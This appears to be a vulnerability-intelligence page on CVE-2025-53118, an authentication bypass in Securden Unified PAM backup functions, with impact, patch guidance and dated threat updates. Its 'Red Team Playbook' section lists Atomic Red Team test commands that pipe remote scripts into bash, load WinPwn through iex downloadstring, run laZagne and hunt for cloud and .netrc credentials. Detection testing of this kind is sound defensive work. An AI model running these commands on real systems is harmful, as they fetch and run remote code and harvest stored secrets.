CVE-2025-53118
Overview
This vulnerability is an authentication bypass in the Securden Unified PAM product, caused by improper access control validation on administrator backup functions. The root cause lies in the failure to enforce authentication checks on critical API endpoints responsible for managing backup operations. The affected component is the Unified PAM's administrative backup management interface, which processes commands without verifying user credentials.
Vulnerability Description
An authentication bypass vulnerability exists which allows an unauthenticated attacker to control administrator backup functions, leading to compromise of passwords, secrets, and application session tokens stored by the Unified PAM.
Impact
An unauthenticated attacker with network access can exploit this vulnerability to control administrator backup functions, enabling extraction or manipulation of stored passwords, secrets, and session tokens. This leads to a full compromise of privileged credentials within the Unified PAM environment. The attack requires no user interaction or prior authentication, as indicated by the CVSS vector AV:N/AC:L/PR:N/UI:N, enabling remote exploitation and complete confidentiality, integrity, and availability impact (C:H/I:H/A:H).
Solution
Securden has released security updates addressing this authentication bypass in Unified PAM. Users should apply the latest patch as detailed in the Rapid7 advisory (https://www.rapid7.com/blog/post/securden-unified-pam-multiple-critical-vulnerabilities-fixed/). The vendor's update enforces proper authentication checks on backup management endpoints. Administrators must upgrade to the fixed version immediately and follow the vendor’s guidance for secure configuration to prevent unauthorized access.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
An authentication bypass vulnerability has been identified that allows unauthenticated attackers to gain control over administrator backup functions within a specific identity management system. This flaw arises from improper validation mechanisms that fail to adequately authenticate users before granting access to sensitive administrative functions. As a result, an attacker can exploit this weakness to manipulate backup processes, potentially leading to unauthorized access to critical data such as passwords, secrets, and application session tokens stored within the Unified Privileged Access Management (PAM) system. The severity of this vulnerability is underscored by its high CVSS score of 9.8, indicating a critical risk level that necessitates immediate attention.
The attack vectors associated with this vulnerability are particularly concerning due to their simplicity and effectiveness. An attacker could leverage automated scripts or manual techniques to send crafted requests to the affected system, bypassing authentication checks entirely. Once access is gained, the attacker can execute backup functions, which may include exporting sensitive data or altering backup configurations to facilitate further attacks. Scenarios could involve an attacker gaining access to a corporate network, exploiting this vulnerability to harvest credentials, or even deploying malicious payloads that compromise the integrity of the entire PAM system. The potential for lateral movement within the network increases significantly, as the attacker could use the harvested credentials to access other critical systems.
The real-world impact of this vulnerability is profound, particularly for organizations that rely on the affected PAM system to secure their privileged accounts. The compromise of passwords and session tokens can lead to unauthorized access to sensitive systems, resulting in data breaches, loss of intellectual property, and significant reputational damage. Furthermore, the financial implications of such breaches can be staggering, with costs associated with incident response, regulatory fines, and potential litigation. Organizations may also face operational disruptions as they scramble to contain the breach and restore normal operations. The risk extends beyond immediate financial loss; it can also erode customer trust and lead to long-term damage to brand reputation.
To effectively detect and mitigate this vulnerability, organizations should implement a multi-layered security approach. Regular security assessments, including vulnerability scanning and penetration testing, should be conducted to identify and remediate weaknesses in the system. Additionally, organizations should enforce strict access controls and ensure that all administrative functions are protected by robust authentication mechanisms, including multi-factor authentication (MFA). Monitoring and logging of administrative actions can also provide valuable insights into potential exploitation attempts, allowing for timely intervention. Regular updates and patches from the vendor should be applied promptly to address known vulnerabilities and enhance the overall security posture of the PAM system.
In conclusion, the authentication bypass vulnerability poses a significant threat to organizations utilizing the affected PAM system. The ease of exploitation and the potential for severe consequences necessitate immediate action to secure systems against unauthorized access. By adopting proactive detection and mitigation strategies, organizations can reduce their risk exposure and safeguard their critical assets against this and similar vulnerabilities in the future. The importance of maintaining a strong security posture cannot be overstated, as the landscape of cyber threats continues to evolve and become increasingly sophisticated.
Recent CSURFACE threat intelligence indicates a measurable increase in the Exploit Prediction Scoring System (EPSS) for CVE-2025-53118, rising by over 19% to a current score placing it near the 97th percentile. This upward trend, although not classified as rapid, reflects growing confidence in the likelihood of exploitation attempts targeting the authentication bypass vulnerability within Securden Unified PAM. While no new exploit techniques or proof-of-concept codes have surfaced in our telemetry, the elevated EPSS score suggests increased attacker interest or preparatory activity that could precede active exploitation campaigns. For defenders, this shift underscores the necessity to maintain heightened vigilance and prioritize detection capabilities around backup function controls, as successful exploitation would grant attackers access to highly sensitive credentials and session tokens. The risk posture for organizations using the affected PAM system has therefore intensified, warranting continuous monitoring of threat intelligence feeds and internal security alerts to detect early signs of exploitation attempts.
Update 2 — May 18, 2026
CSURFACE threat intelligence has identified a marked escalation in detection activity related to CVE-2025-53118, indicating increased reconnaissance or preparatory actions by threat actors targeting the backup functions of the affected Unified PAM system. This uptick is reflected in a modest but consistent rise in the EPSS score, signaling growing likelihood of exploitation attempts in the near term. While no new exploit techniques or payloads have been observed, the surge in telemetry suggests adversaries are intensifying efforts to probe and potentially weaponize this critical authentication bypass vulnerability. For defenders, this development elevates the urgency to monitor for anomalous access patterns and backup function manipulations, as successful exploitation would expose highly sensitive credentials and session tokens, amplifying the risk of lateral movement and persistent compromise. Consequently, the threat level associated with this vulnerability has increased from a theoretical concern to a more imminent operational threat, underscoring the need for sustained vigilance and enhanced detection capabilities within environments deploying the affected PAM solution.
Update 3 — June 07, 2026
CSURFACE threat intelligence has detected a slight increase in activity related to CVE-2025-53118, reflected by a modest rise in telemetry signals indicating attempts to exploit the authentication bypass vulnerability in Securden Unified PAM. Although the EPSS score shows a marginal decline, the persistence of detection events suggests continued adversary interest and probing within affected environments. This subtle uptick, while not indicative of a rapid escalation or widespread exploitation, reinforces the vulnerability’s operational relevance and the potential for targeted attacks aimed at compromising privileged backup functions. For defenders, this development underscores the necessity to maintain heightened monitoring and analysis of backup-related administrative actions, as successful exploitation remains a critical vector for credential and session token compromise. The threat level remains critical, with the evolving detection landscape signaling that the vulnerability is actively probed, warranting sustained vigilance despite the absence of new exploit variants or significant shifts in exploit probability.
Update 4 — June 15, 2026
CSURFACE threat intelligence has identified a moderate increase in detection activity related to CVE-2025-53118, indicating a renewed interest by threat actors in probing the authentication bypass vulnerability affecting Securden Unified PAM. Despite a slight decline in the EPSS score, which suggests a marginal reduction in the overall exploit probability, the uptick in telemetry signals ongoing reconnaissance and potential preparatory actions by adversaries. This divergence between detection frequency and exploit probability underscores the complexity of the threat landscape, where increased scanning or probing does not necessarily translate into immediate exploitation but may precede more targeted campaigns. For defenders, this dynamic highlights the importance of sustained monitoring of backup administrative functions, as the vulnerability remains a critical vector for compromising privileged credentials and session tokens. The threat level remains critical, with the evolving detection patterns signaling that attackers continue to actively assess this vulnerability, warranting continued vigilance despite the absence of new exploit variants or significant shifts in exploit likelihood.
Update 5 — July 12, 2026
CSURFACE threat intelligence has identified a slight increase in detection activity related to CVE-2025-53118, indicating continued reconnaissance and probing efforts targeting the authentication bypass vulnerability in Securden Unified PAM. Although the uptick is modest, it reflects persistent attacker interest in exploiting backup administrative functions to access sensitive credentials and session tokens. The EPSS score remains high and stable, reinforcing the vulnerability’s critical status despite the absence of new exploit variants or rapid escalation in exploitation attempts. This subtle rise in telemetry suggests adversaries are maintaining active surveillance and potentially preparing for more focused campaigns, underscoring the necessity for defenders to sustain rigorous monitoring and incident response readiness. The overall threat level remains critical, with the evolving detection patterns confirming ongoing adversary engagement rather than a diminishing risk.
Affected Products
No CPE information available.
Exploits
No exploits found for this CVE.
Threat Feed
19 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (2)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2025-53118 |
| rapid7.com |
GitHub CVE
third-party-advisory
|
https://www.rapid7.com/blog/post/securden-unified-pam-multiple-critical-vulnerabilities-fixed/ |